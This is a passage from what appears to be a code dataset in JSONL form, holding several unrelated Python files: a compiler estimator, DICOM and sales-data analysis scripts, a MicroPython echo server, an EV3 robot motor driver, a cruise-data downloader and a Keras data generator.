enodes.Float(Decimal(literal.value), float_type)\n\n def estimate_string_literal(self, literal: nodes.StringLiteral) -> enodes.Expression:\n return enodes.String(literal.value)\n\n def estimate_char_literal(self, literal: nodes.CharLiteral) -> enodes.Expression:\n return enodes.Char(literal.value)\n\n def estimate_bool_literal(self, literal: nodes.BoolLiteral) -> enodes.Expression:\n return enodes.Bool(literal.value == nodes.BoolLiteral.true.value)\n\n def estimate_vector_literal(self, literal: nodes.VectorLiteral) -> enodes.Expression:\n vector_type = self.infer_type(literal)\n assert isinstance(vector_type, nodes.VectorType)\n return enodes.Vector([self.estimate_expression(element) for element in literal.elements], vector_type.subtype)\n\n def estimate_dict_literal(self, literal: nodes.DictLiteral) -> enodes.Expression:\n dict_type = self.infer_type(literal)\n assert isinstance(dict_type, nodes.DictType)\n return enodes.Dict(\n [self.estimate_expression(key) for key in literal.keys],\n [self.estimate_expression(value) for value in literal.values],\n dict_type.key_type, dict_type.value_type\n )\n\n def infer_type(self, expression: nodes.Expression, supertype: t.Optional[nodes.Type] = None) -> nodes.Type:\n self.type_checker.update_context(self.env, self.code)\n result = self.type_checker.infer_type(expression, supertype)\n return result.type\n\n def update_context(self, env: environment.Environment, code: errors.Code = None):\n self.env = env\n self.code = code or self.code\n\n def entry(self, name: nodes.Name) -> entries.Entry:\n if name.module:\n assert 0, \"Module system is not supported\"\n entry = self.env[name.member]\n assert entry is not None\n return entry\n\n def test(self):\n self.assertEqual(NODES, set(subclass.__name__ for subclass in self.node_dispatcher.keys()))\n self.assertEqual(EXPRESSIONS, set(subclass.__name__ for subclass in self.expression_dispatcher.keys()))\n self.assertEqual(ASSIGNMENTS, set(subclass.__name__ for subclass in self.assignment_dispatcher.keys()))\n\n\nEstimator = partial(\n Evaluator,\n EstimatedObjects(\n builtin_funcs=builtin_funcs, private_builtin_funcs=private_builtin_funcs, string_fields=string_fields, vector_fields=vector_fields, dict_fields=dict_fields\n )\n)\n","sub_path":"compiler/estimation.py","file_name":"estimation.py","file_ext":"py","file_size_in_byte":44453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"492953596","text":"import itertools\nimport operator\nimport os\nimport pickle\n\nimport numpy as np\nimport pydicom as dicom\n\nimport collections\n\n\nclass VectorAverageCalc:\n\tdef __init__(self):\n\t\tself.pickledDataExists = True\n\t\tnormal_list = []\n\t\tif not self.pickledDataExists:\n\t\t\tself.hypertrophy_folder = \"../hypertrophy\"\n\t\t\thyp_folders = sorted(os.listdir(self.hypertrophy_folder))\n\n\t\t\tfor patient_folder in hyp_folders:\n\t\t\t\tfolder_path = os.path.join(self.hypertrophy_folder, patient_folder, \"la\")\n\t\t\t\tdcm_files = sorted(os.listdir(folder_path))\n\n\t\t\t\tdcm_files = [d for d in dcm_files if len(d.split('.')[-2]) < 4]\n\t\t\t\tif len(dcm_files) == 0: # sometimes the order number is missing at the end\n\t\t\t\t\tdcm_files = sorted(os.listdir(folder_path))\n\n\t\t\t\t# we only care about files that have a filename longer than 10 characters\n\t\t\t\tdcm_files = [d for d in dcm_files if len(d.split('.')[-2]) > 10]\n\n\t\t\t\tvector_list_in_folder = []\n\n\t\t\t\t# print(patient_folder)\n\n\t\t\t\tfor file in dcm_files:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ttemp_ds = dicom.dcmread(os.path.join(folder_path, file))\n\t\t\t\t\t\t# We only want to store each orientation once\n\t\t\t\t\t\tif temp_ds.ImageOrientationPatient not in vector_list_in_folder:\n\t\t\t\t\t\t\tvector_list_in_folder.append(temp_ds.ImageOrientationPatient)\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tprint('Exception while reading dcm file' + os.path.join(folder_path, file) + ': ' + repr(e))\n\n\t\t\t\t# We'll only save the ones that have three different normals in it, which are probably the ones that interest us the most\n\t\t\t\tif len(vector_list_in_folder) == 3:\n\t\t\t\t\t# This can probably be done in a much cleaner way\n\t\t\t\t\treshaped_vector_list_in_folder = np.asarray(vector_list_in_folder).reshape(3, 2, 3)\n\t\t\t\t\tnormal_list_in_folder = np.empty([3, 3])\n\t\t\t\t\tfor i in range(3):\n\t\t\t\t\t\tnormal_list_in_folder[i] = np.cross(reshaped_vector_list_in_folder[i][0], reshaped_vector_list_in_folder[i][1])\n\t\t\t\t\tnormal_list.append(normal_list_in_folder)\n\t\t\t\t\t# print(patient_folder)\n\n\t\t\tfile = open(\"pickled_data_limited\", 'wb')\n\t\t\tpickle.dump(normal_list, file)\n\t\t\tfile.close()\n\t\telse: # pickled data exists\n\t\t\tfile = open(\"pickled_data_limited\", 'rb')\n\t\t\tnormal_list = pickle.load(file)\n\t\t\tfile.close()\n\t\t# print(normal_list)\n\t\tfor i in range(3):\n\t\t\tfor normal in normal_list:\n\t\t\t\t# if len(normal) > 1:\n\t\t\t\tprint(normal[1][i])\n\t\t\tprint(\"\\n\")\n","sub_path":"vector_average_calc.py","file_name":"vector_average_calc.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"636953646","text":"# #asyncio_echo_server_coroutine.py\n# # https://pymotw.com/3/asyncio/io_coroutine.html#echo-server\n#\n# import uasyncio\n# # import logging\n# import sys\n#\n# # SERVER_ADDRESS = ('localhost', 10000)\n# SERVER_ADDRESS = ('192.168.4.1', 8080)\n# # logging.basicConfig(\n# # level=logging.DEBUG,\n# # format='%(name)s: %(message)s',\n# # stream=sys.stderr,\n# # )\n# # # log = logging.getLogger('main')\n#\n# event_loop = uasyncio.get_event_loop()\n#\n# async def echo(reader, writer):\n# address = writer.get_extra_info('peername')\n# # log = logging.getLogger('echo_{}_{}'.format(*address))\n# print(('echo_{}_{}'.format(*address)))\n# # log.debug('connection accepted')\n# print('connection accepted')\n#\n# while True:\n# data = await reader.read(128)\n#\n# if data:\n# print(('received {!r}'.format(data)))\n# writer.write(data)\n# await writer.drain()\n# # log.debug('sent {!r}'.format(data))\n# print(('sent {!r}'.format(data)))\n#\n# else:\n# # log.debug('closing')\n# print('closing')\n# writer.close()\n# return\n#\n# # Create the server and let the loop finish the coroutine before\n# # starting the real event loop.\n# factory = uasyncio.start_server(echo, *SERVER_ADDRESS)\n# server = event_loop.run_until_complete(factory)\n# # log.debug('starting up on {} port {}'.format(*SERVER_ADDRESS))\n# print(('starting up on {} port {}'.format(*SERVER_ADDRESS)))\n#\n# try:\n# event_loop.run_forever()\n# except KeyboardInterrupt:\n# pass\n# finally:\n# # log.debug('closing server')\n# print('closing server')\n# server.close()\n# event_loop.run_until_complete(server.wait_closed())\n# # log.debug('closing event loop')\n# print('closing event loop')\n# event_loop.close()\n#\n#\n# # >>>\n# # >>> import main\n# # echo_192.168.4.2_42564\n# # connection accepted\n# # received b'GET / HTTP/1.1\\r\\nHost: 192.168.4.1:8080\\r\\nConnection: keep-alive\\r\\nUpgrade-Insecure-Requests: 1\\r\\nUser-Agent: Mozilla/5.0 (X11; Linu'\n# # Traceback (most recent call last):\n# # File \"\", line 1, in \n# # File \"main.py\", line 45, in \n# # File \"uasyncio/core.py\", line 180, in run_until_complete\n# # File \"uasyncio/core.py\", line 154, in run_forever\n# # File \"uasyncio/core.py\", line 109, in run_forever\n# # File \"main.py\", line 31, in echo\n# # AttributeError: 'StreamWriter' object has no attribute 'write'\n\n\nimport uasyncio as asyncio\n\n@asyncio.coroutine\ndef serve(reader, writer):\n print(reader, writer)\n print(\"================\")\n # print((yield from reader.read())) # orig\n # print((yield from reader.read())) # mod readline\n # line = yield from reader.readline()\n line = yield from reader.read()\n print('DBG line: {}, {}'.format(type(line), str(line))) # mod readline\n yield from writer.awrite(\"HTTP/1.0 200 OK\\r\\n\\r\\nHello.\\r\\n\")\n print(\"After response write\")\n yield from writer.aclose()\n print(\"Finished processing request\")\n\n\n# import logging\n#logging.basicConfig(level=logging.INFO)\n# logging.basicConfig(level=logging.DEBUG)\nloop = asyncio.get_event_loop()\n# loop.call_soon(asyncio.start_server(serve, \"127.0.0.1\", 8081))\nloop.call_soon(asyncio.start_server(serve, \"192.168.4.1\", 80))\nloop.run_forever()\nloop.close()\n\n","sub_path":"async-firmware-app/testing/tester-084-086/tcpserver.py","file_name":"tcpserver.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"66613601","text":"import Modules.Outputs.printing as pr\nimport Modules.Outputs.leds as leds\nimport time\nimport Other.what_robot as wr\nimport json\nimport Modules.Outputs.beeper as bp\nimport Other.variables as v\n\ndef setting_manager(action, what_to_write = \"\"): #has to be outside of class\n try:\n if action == \"read\":\n f = open(\"calibrated_motor_arrangement.txt\", \"r+\")\n return json.loads(str(f.read()).strip())\n elif action == \"write\":\n f = open(\"calibrated_motor_arrangement.txt\", \"w+\")\n f.write(json.dumps(what_to_write))\n print(\"Written to file successfully\")\n except Exception as e:\n pr.rprint(\"Could not write to json file. \", e, error_type=\"major\")\n\n\nclass Driver:\n def __init__(self, robot, motor_value): #motor_value is actually a reference to the motor value variable\n try:\n self.motor_values = motor_value\n self.robot = robot\n self.maneuvering = False\n self.en = 0\n self.sleep_time = 0\n self.ports = [\"outA\", \"outB\", \"outC\", \"outD\"]\n except Exception as e:\n pr.rprint(\"Could not initialise driver. \\n\", e, error_type=\"critical\")\n\n def motor_map(self, A, B, C, D, set_type = \"set\"):\n try:\n if set_type == \"set\":\n self.motor_values[\"a\"] = A\n self.motor_values[\"b\"] = B\n self.motor_values[\"c\"] = C\n self.motor_values[\"d\"] = D\n elif set_type == \"add\":\n self.motor_values[\"a\"] += A\n self.motor_values[\"b\"] += B\n self.motor_values[\"c\"] += C\n self.motor_values[\"d\"] += D\n except Exception as e:\n pr.rprint(\"Could not map motor values. \\n\", e, error_type=\"major\")\n\n #* Simple functions\n\n def straight(self, speed):\n try:\n self.robot.motor_values[\"a\"] += speed \n self.robot.motor_values[\"b\"] -= speed\n self.robot.motor_values[\"c\"] += speed\n self.robot.motor_values[\"d\"] -= speed\n except Exception as e:\n pr.rprint(\"Could not go straight. \\n\", e, error_type=\"major\")\n \n def hard_r(self, speed):\n try:\n self.motor_values[\"a\"] -= speed\n self.motor_values[\"b\"] += speed\n self.motor_values[\"c\"] += speed\n self.motor_values[\"d\"] -= speed\n except Exception as e:\n pr.rprint(\"Could not go hard right. \\n\", e, error_type=\"major\")\n \n def hard_l(self, speed):\n try:\n self.motor_values[\"a\"] += speed\n self.motor_values[\"b\"] -= speed\n self.motor_values[\"c\"] -= speed\n self.motor_values[\"d\"] += speed\n except Exception as e:\n pr.rprint(\"Could not go hard left. \\n\", e, error_type=\"major\")\n \n def sideways(self, speed, side):\n try:\n if side.lower() == \"r\":\n self.motor_values[\"a\"] = 0\n self.motor_values[\"b\"] = 0\n self.motor_values[\"c\"] += speed\n self.motor_values[\"d\"] -= speed\n elif side.lower() == \"l\":\n self.motor_values[\"a\"] += speed\n self.motor_values[\"b\"] -= speed\n self.motor_values[\"c\"] = 0\n self.motor_values[\"d\"] = 0\n except Exception as e:\n pr.rprint(\"Could not go sideways. \\n\", e, error_type=\"major\")\n \n def rotate(self, timee, speeed):\n try:\n self.robot.motor_a.run_timed(time_sp = timee * 1000, speed_sp = speeed, stop_action = \"brake\")\n self.robot.motor_b.run_timed(time_sp = timee * 1000, speed_sp = speeed, stop_action = \"brake\")\n self.robot.motor_c.run_timed(time_sp = timee * 1000, speed_sp = speeed, stop_action = \"brake\")\n self.robot.motor_d.run_timed(time_sp = timee * 1000, speed_sp = speeed, stop_action = \"brake\")\n time.sleep(timee + 0.2)\n self.robot.motor_a.stop()\n self.robot.motor_b.stop()\n self.robot.motor_c.stop()\n self.robot.motor_d.stop()\n time.sleep(0.4)\n except Exception as e:\n pr.rprint(\"Could not rotate. \\n\", e, error_type=\"major\")\n def brake_all(self):\n try:\n try:\n self.robot.motor_a.stop()\n except Exception as e:\n pr.rprint(\"Could not stop motor a. \\n\", e, error_type = \"critical\")\n try:\n self.robot.motor_b.stop()\n except Exception as e:\n pr.rprint(\"Could not stop motor b. \\n\", e, error_type = \"critical\")\n try:\n self.robot.motor_c.stop()\n except Exception as e:\n pr.rprint(\"Could not stop motor c. \\n\", e, error_type = \"critical\")\n try:\n self.robot.motor_d.stop()\n except Exception as e:\n pr.rprint(\"Could not stop motor d. \\n\", e, error_type = \"critical\")\n except Exception as e:\n pr.rprint(\"Could not stop. \\n\", e, error_type=\"major\")\n\n def drive(self, drive_type = \"proportional\"):\n try:\n new = [self.motor_values[\"a\"], self.motor_values[\"b\"], self.motor_values[\"c\"],self.motor_values[\"d\"]]\n old = [self.motor_values[\"old\"][\"a\"], self.motor_values[\"old\"][\"b\"], self.motor_values[\"old\"][\"c\"], self.motor_values[\"old\"][\"d\"]]\n percentageOffset = 1\n #print(self.robot.motor_values[\"a\"], self.robot.motor_values[\"b\"] , self.robot.motor_values[\"c\"] , self.robot.motor_values[\"d\"]) \n\n if drive_type == \"proportional\": #proportionally scales the values\n for neww, oldd in zip(new, old):\n if neww != oldd: #makes sure if we need to recalculate everything\n maxx = max(new)\n minn = min(new)\n if maxx > 100:\n percentageOffset = 100 / abs(maxx)\n elif minn < -100:\n percentageOffset = 100 / abs(minn)\n motor_temp = [item * percentageOffset for item in new] #fast boi list comprehension\n self.motor_values[\"a\"] = int(motor_temp[0])\n self.motor_values[\"b\"] = int(motor_temp[1])\n self.motor_values[\"c\"] = int(motor_temp[2])\n self.motor_values[\"d\"] = int(motor_temp[3])\n break #*makes sure we only do this once\n\n elif drive_type == \"clamp\": #clamps the values\n for neww, oldd in zip(new, old):\n if neww != oldd: #again making sure that we don't mess with random stuff\n self.motor_values[\"a\"] = max(min(self.motor_values[\"a\"], 100), -100)\n self.motor_values[\"b\"] = max(min(self.motor_values[\"b\"], 100), -100)\n self.motor_values[\"c\"] = max(min(self.motor_values[\"c\"], 100), -100)\n self.motor_values[\"d\"] = max(min(self.motor_values[\"d\"], 100), -100)\n break #*makes sure we only do this once\n\n \n #next chunk of code makes sure that we don't write motor value to motors with the same value\n\n #if self.motor_values[\"a\"] != old[0]:\n try:\n self.robot.motor_a.run_direct(duty_cycle_sp = self.motor_values[\"a\"] * v.speed_multiplier)\n except Exception as e:\n self.brake_all()\n pr.rprint(\"Could not drive motors in motor_a. \\n\", e, error_type=\"critical\")\n try:\n self.robot.motor_b.run_direct(duty_cycle_sp = self.motor_values[\"b\"] * v.speed_multiplier)\n except Exception as e:\n self.brake_all()\n pr.rprint(\"Could not drive motors in motor_b. \\n\", e, error_type=\"critical\")\n try:\n self.robot.motor_c.run_direct(duty_cycle_sp = self.motor_values[\"c\"] * v.speed_multiplier)\n except Exception as e:\n self.brake_all()\n pr.rprint(\"Could not drive motors in motor_c. \\n\", e, error_type=\"critical\")\n try:\n self.robot.motor_d.run_direct(duty_cycle_sp = self.motor_values[\"d\"] * v.speed_multiplier)\n except Exception as e:\n self.brake_all()\n pr.rprint(\"Could not drive motors in motor_d. \\n\", e, error_type=\"critical\")\n \n self.robot.motor_values[\"old\"] = { #set the new old values lol\n \"a\": old[0],\n \"b\": old[1],\n \"c\": old[2],\n \"d\": old[3]\n }\n time.sleep(self.sleep_time) #if there is a set time delay then do it. Useful for when stuck against wall\n self.robot.motor_values[\"a\"] = 0\n self.robot.motor_values[\"b\"] = 0\n self.robot.motor_values[\"c\"] = 0\n self.robot.motor_values[\"d\"] = 0\n self.robot.extra_offset = 0\n self.sleep_time = 0\n except Exception as e:\n pr.rprint(\"Could not drive motors. \\n\", e, error_type=\"major\")\n\n # todo: complex functions (such as trig driver)\n \n #* Helper methods\n\n def copy_motor_values(self):\n try:\n return {\n \"new\": [self.motor_values[\"a\"], self.motor_values[\"b\"], self.motor_values[\"c\"],self.motor_values[\"d\"]],\n \"old\": [self.motor_values[\"old\"][\"a\"], self.motor_values[\"old\"][\"b\"], self.motor_values[\"old\"][\"c\"], self.motor_values[\"old\"][\"d\"]]\n }\n except Exception as e:\n pr.rprint(\"Failed to copy motor values. \\n\", e, error_type=\"major\")\n return None\n \n def motor_speeds(self):\n try:\n return [self.robot.motor_a.speed, self.robot.motor_b.speed, self.robot.motor_c.speed, self.robot.motor_d.speed]\n except Exception as e:\n pr.rprint(\"Error with returning motor speeds: \\n\", e)\n return [0,0,0,0]\n \n def check_if_robot_halted(self):\n try:\n motorSpeeds = self.motor_speeds()\n for item in motorSpeeds:\n if item in range(-100, 100):\n return True\n else:\n return False\n except Exception as e:\n pr.rprint(\"Error with checking if robot halted: \\n\", e)\n return False\n \n def antistuck(self): #aka check if robot halted but actually working\n try:\n start_time = time.time()\n # the real antistuck\n while (time.time() - start_time) < 1.5:\n self.robot.sensor_methods.refresh_f_ir()\n f_ir = self.robot.f_ir_value\n self.robot.sensor_methods.refresh_b_ir()\n b_ir = self.robot.b_ir_value\n\n self.robot.sensor_methods.refresh_cmps()\n self.robot.sensor_methods.compass_adjustment()\n\n if f_ir > 0 or b_ir > 0:\n self.straight(100)\n self.drive(\"proportional\")\n break\n else:\n self.straight(100)\n self.drive(\"proportional\")\n else:\n start_time = time.time()\n while (time.time() - start_time) < 1.5:\n self.robot.sensor_methods.refresh_f_ir()\n f_ir = self.robot.f_ir_value\n self.robot.sensor_methods.refresh_b_ir()\n b_ir = self.robot.b_ir_value\n\n self.robot.sensor_methods.refresh_cmps()\n self.robot.sensor_methods.compass_adjustment()\n\n if f_ir > 0 or b_ir > 0:\n self.straight(-100)\n self.drive(\"proportional\")\n break\n else:\n self.straight(-100)\n self.drive(\"proportional\")\n except Exception as e:\n pr.rprint(\"Error with checking if robot halted: \\n\", e)\n return False\n \n def calibrate_motors(self):\n try:\n self.robot.init_motors([\"outA\",\"outB\",\"outC\",\"outD\"], [0,0,0,0])\n leds.led_change(\"wait\")\n motor = [None, None, None, None]\n actual_value = (self.robot.motor_a.speed,self.robot.motor_b.speed,self.robot.motor_c.speed,self.robot.motor_d.speed)\n for n in range(0, 4):\n bp.beep(864, 100)\n print(\"You are now writing to the \", n + 1 , \"st motor\")\n while motor[n] == None:\n actual_value = (self.robot.motor_a.speed,self.robot.motor_b.speed,self.robot.motor_c.speed,self.robot.motor_d.speed)\n for index, item in enumerate(actual_value):\n\n if item > 100 or item < -100:\n if item >= 0:\n motor[n] = [self.ports[index], 0]\n else:\n motor[n] = [self.ports[index], 1]\n print(motor[n], self.ports[n])\n \n while actual_value[index] != 0:\n actual_value = (self.robot.motor_a.speed,self.robot.motor_b.speed,self.robot.motor_c.speed,self.robot.motor_d.speed)\n leds.led_change(\"fixed\")\n bp.beep(440, 200)\n bp.beep(523.25, 100)\n bp.beep(659.25, 100)\n return { str(wr.robot_type): motor } \n except Exception as e:\n pr.rprint(\"Could not successfully calibrate motors. Defaulting to previous version...\", e, error_type=\"major\")\n return {}\n \n def maneuver(self, funktion, duration, *args, **kwargs):\n try:\n start_time = time.time()\n if not maneuvering:\n maneuvering = True\n while maneuvering:\n #thing here\n if (-start_time + time.time()) >= duration:\n maneuvering = False\n funktion(*args, **kwargs)\n except Exception as e:\n pr.rprint(\"Could not perform maneuver. \", e, error_type=\"major\")\n \n def calibration(self):\n try:\n self.rotate(6, 200) #work on it\n self.rotate(6, 200)\n except Exception as e:\n pr.rprint(\"Could not perform maneuver. \", e, error_type=\"major\")","sub_path":"Modules/Outputs/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":14549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"140828430","text":"import os\nfrom cmapingest import vault_structure as vs\n\n\nodir = vs.collected_data + \"insitu/cruise/misc_cruise/KM0704_CMORE_BULA/\"\n\n\ndef download_KM0704_data(outputdir, download_link):\n wget_str = f\"\"\"wget -P '{outputdir}' -np -R \"'index.html*\" robots=off -nH --cut-dirs 8 -r {download_link}\"\"\"\n os.system(wget_str)\n\n\n# #download ctd\ndownload_KM0704_data(\n odir + \"CTD/\", \"https://hahana.soest.hawaii.edu/FTP/cmore/ctd/bula1/\"\n)\n\n# download bottle\ndownload_KM0704_data(\n odir + \"bottle/\", \"https://hahana.soest.hawaii.edu/FTP/cmore/water/bula1/\"\n)\n\n# download underway\ndownload_KM0704_data(\n odir + \"underway/\", \"https://hahana.soest.hawaii.edu/FTP/cmore/underway/bula1/\"\n)\n\n# download wind\ndownload_KM0704_data(\n odir + \"wind/\", \"https://hahana.soest.hawaii.edu/FTP/cmore/winds/bula1\"\n)\n","sub_path":"insitu/cruise/misc_cruise/KM0704_CMORE_BULA/collect_KM0704_CMORE_BULA.py","file_name":"collect_KM0704_CMORE_BULA.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"346718090","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 11 08:00:02 2020\n\n@author: jeffe\n\"\"\"\n\n\nimport pandas as pd \n\n\npath_guardado = 'C://Users//jeffe//Documents//GIT//python//py-collantes-yunga-jefferson-paul//03 - pandas//data//artwork_data.pickle'\ndf = pd.read_pickle(path_guardado)\n\n\n#loc\n#sirve para \n#primero = df.loc[1035,'artist']\nfiltrado_horizontal = df.loc[1035]\n\nprint(filtrado_horizontal)\nprint(filtrado_horizontal['artist'])\nprint(filtrado_horizontal.index)#indices columnas \n\nserie_vertical = df['artist']\n\nprint (serie_vertical)\nprint(serie_vertical.index)\n\n#filtrar por indice\n\ndf_1035 = df[df.index==1035]\n\nsegundo = df.loc[1035]#filtrar por indice \nsegundo = df.loc[[1035,1036]]#Filtrar por array\nsegundo = df.loc[3:5]#Filtrar desde un indice x hasta un indice y \n\nsegundo = df.loc[1035,'artist']#1 indice\nsegundo = df.loc[1035,['artist','medium']]#varios indices\n\n#iloc\ntercero = df.iloc[0]\ntercero = df.iloc[[0,1]]\ntercero = df.iloc[df.index == 1035]\n\ntercero = df.iloc[0:10,0:4]\n\n\n##########\ndatos = {\n \"nota 1\":{\n \"Pepito\":7,\n \"Juanita\":8,\n \"Maria\":9},\n \"nota 2\":{\n \"Pepito\":7,\n \"Juanita\":8,\n \"Maria\":9},\n \"disciplina\":{\n \"Pepito\":4,\n \"Juanita\":9,\n \"Maria\":2}}\n\nnotas = pd.DataFrame(datos)\n\ncondicion_nota = notas[\"nota 1\"] > 7\ncondicion_nota_dos = notas[\"nota 2\"] > 7\ncondicion_disc = notas[\"disciplina\"] > 7 \n\nmayores_siete = notas.loc[condicion_nota,[\"nota 1\"]]\n\npasaron = notas.loc[condicion_nota][condicion_nota_dos][condicion_disc]\n\nnotas.loc[\"Maria\",\"disciplina\"] = 7\n\n#poner los registros de todas con 7 \nnotas.loc[:,\"disciplina\"]=7\n\n#sumar las noras de los registros y dividir para 3 \nsuma_notas = notas[\"nota 1\"] + notas[\"nota 2\"] +notas[\"disciplina\"]\n\ndividir_notas = suma_notas /3\n\n\n\n\n\n\n\n\n\n","sub_path":"03 - pandas/g_iloc_loc.py","file_name":"g_iloc_loc.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"424323583","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport matplotlib.pylab as plt\nfrom pandas import Series, DataFrame\n\ntrain = pd.read_csv('E:\\lga\\\\time\\sales_train_v2.csv', encoding='utf-8')\ndf_items = pd.read_csv('E:\\lga\\\\time\\items.csv', encoding='utf-8')\ntrain_1 = pd.merge(train ,df_items ,how='left')\ntrain_1.set_index([\"shop_id\"], inplace=True)\nfor i in range(0,60):\n df_x = train_1.loc[i,:]\n df_x.to_csv('E:\\\\lga\\\\time\\\\shop\\\\shop_{shop_id}.csv'.format(shop_id=i), encoding='utf-8')\n print('succeed')\n\n\n#对第一家商店进行分析\nshop_0 = pd.read_csv(\"E:\\lga\\\\time\\\\shop\\shop_0.csv\", encoding='utf-8')\nshop_0.head()\ndel shop_0['item_name'] #删除一列\nshop_0.describe()\ngroup1 = shop_0.groupby('item_cnt_day')\ngroup1.size() #求出item_cnt_day的分布情况\ngroup2 = shop_0.groupby(['item_cnt_day','item_category_id'])\ngroup2.size()\n\n\n#对每个商店2年内每月内的每日总销量进行可视化展示\nshop_0_series = shop_0.loc[:,['date','item_cnt_day']]\nshop_0_series.index = shop_0_series['date']\ndel shop_0_series['date']\nshop_0_series.index = pd.to_datetime(shop_0_series.index, format='%d.%m.%Y')\nshop_0_series['item_cnt_day'] = shop_0_series['item_cnt_day'].astype(int) #将item_cnt_day转换为整数类型\ngroup3 = shop_0_series.groupby(shop_0_series.index)\ntimelist = group3.size()\ntimelist = list(timelist.index) #将时间段放入列表\ntimelist_0 = []\nfor x in range(0, len(timelist)):\n str_1 = str(timelist[x])[0:10]\n timelist_0.append(str_1)\n print('succeed') #将timelist内每一项的时间类型转换为str\n\ndef shop_item_cnt_sum(timelist, shop):\n #组成一个新的df,shop必须为一列item_cnt_day其index为date\n df = DataFrame(columns=('date', 'item_cnt_day'))\n\n for i in timelist:\n A = sum(shop[i]['item_cnt_day'])\n row = DataFrame({'date':[i], 'item_cnt_day':[A]})\n df = df.append(row, ignore_index=True)\n\n df.index = df['date']\n df.index = pd.to_datetime(df.index, format='%Y-%m-%d')\n return df\n\n\n#取出所有的shop,对每个shop求sum最后做成一张折线表\nfor i in range(0,60):\n shop_series = pd.read_csv(\"E:\\lga\\\\time\\\\shop\\shop_{0}.csv\".format(i), encoding='utf-8')\n del shop_series['item_name']\n shop_series = shop_series.loc[:, ['date', 'item_cnt_day']]\n shop_series.index = shop_series['date']\n del shop_series['date']\n shop_series.index = pd.to_datetime(shop_series.index, format='%d.%m.%Y')\n A = shop_item_cnt_sum(timelist_0, shop_series)\n A['item_cnt_day'].plot()\nplt.show()\n\n\n#对训练集内的总成交量按月进行汇总\ntrain = pd.read_csv('E:\\lga\\\\time\\sales_train_v2.csv', encoding='utf-8')\ntrain_0 = train.loc[:,['date_block_num','item_cnt_day']]\ntrain_0.index = train_0['date_block_num']\ndef shop_item_cnt_sum(train_0):\n #组成一个新的df,shop必须为一列item_cnt_day其index为date\n df = DataFrame(columns=('date_block_num_all', 'item_cnt_day'))\n for i in range(0,34):\n A =sum(train_0[train_0.loc[:,'date_block_num']==i]['item_cnt_day'])\n row = DataFrame({'date_block_num_all': [i], 'item_cnt_day': [A]})\n df = df.append(row, ignore_index=True)\n return df\n\ntrain_0_0 = shop_item_cnt_sum(train_0)\ntrain_0_0.index = train_0_0['date_block_num_all']\ndel train_0_0['date_block_num_all']\ntrain_0_0['item_cnt_day'].plot()\n\n\n\n","sub_path":"sales/data_clean.py","file_name":"data_clean.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"266813051","text":"import numpy as np\nfrom array import array\nimport tensorflow as tf\nimport datetime\nimport tensorflow.keras as keras\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import *\n\ndef rotate_point_cloud(batch_data):\n \"\"\" Randomly rotate the point clouds to augument the dataset\n rotation is per shape based along up direction\n Input:\n BxNx3 array, original batch of point clouds\n Return:\n BxNx3 array, rotated batch of point clouds\n \"\"\"\n rotated_data = np.zeros(batch_data.shape, dtype=np.float32)\n for k in range(batch_data.shape[0]):\n rotation_angle = np.random.uniform() * 2 * np.pi\n cosval = np.cos(rotation_angle)\n sinval = np.sin(rotation_angle)\n rotation_matrix = np.array([[cosval, -sinval, 0, 0, 0],\n [sinval, cosval, 0, 0, 0],\n [0, 0, 1, 0, 0],\n [0, 0, 0, 1, 0],\n [0, 0, 0, 0, 1]])\n shape_pc = batch_data[k, ...]\n rotated_data[k, ...] = np.dot(shape_pc.reshape((-1, 5)),rotation_matrix)\n return rotated_data\n\n\nclass DataGenerator(tf.keras.utils.Sequence):\n #def __init__(self,data, batch_size=32, num_classes=None, data_form=\"pixel\",num_channel=None,num_point=2048,rotation=False,pix=90,target=0):\n def __init__(self,data,batch_size=32, num_classes=None, data_form=\"pixel\",channel=None,num_point=2048,rotation=False,pix=90,target=0,stride=[0],seed=123,**kwargs):\n np.random.seed(123)\n self.target=target\n self.stride=stride\n self.batch_size = batch_size\n self.num_classes = num_classes\n data_forms={\"pixel\":0,\"voxel\":1,\"point\":2}\n self.data_form=data_forms[data_form]\n num_channels=[4,2,5]\n self.default_channel=num_channels[self.data_form] \n #self.signal=sigchain\n #self.background=bakchain\n #self.data=[self.signal,self.background]\n self.data=data\n #self.bak_total_len=self.background.GetEntries()\n #self.sig_total_len=self.signal.GetEntries()\n self.total_len=[sample.GetEntries() for sample in data]\n if(not num_classes):\n num_classes=len(data)\n self.num_classes=num_classes\n if(not channel):\n channel=range(self.default_channel)\n self.channel=channel\n self.num_point=num_point\n self.pix=pix\n data_shapes={\"pixel\":(len(channel),pix,pix),\"voxel\":(len(channel),pix,pix,pix),\"point\":(num_point,len(channel))}\n self.data_shape=data_shapes[data_form]\n\n self.rotation=rotation\n self.on_epoch_end()\n\n def __len__(self):\n return int(sum(self.total_len) // self.batch_size)-1 # number of batches\n\n def __getitem__(self, index):\n #index = self.index[index * self.batch_size : (index + 1) * self.batch_size] # batch index list\n #batch = [self.indices[k] for k in index] indices[1] [1,2,3,4]\n X, y = self.__get_data(self.batch_size)\n return X, y\n\n def divide(self,num_slice=1,num_piece=0):\n self.total_len=[int(sample_len/num_slice) for sample_len in self.total_len]\n print(self.total_len)\n assert not 0 in self.total_len,\"Error : slice is bigger than sample\"\n self.index = np.arange(sum(self.total_len)) # data index list\n self.choice_p=[1.*sample_len/sum(self.total_len) for sample_len in self.total_len]\n self.begin=[num_piece*sample_len for sample_len in 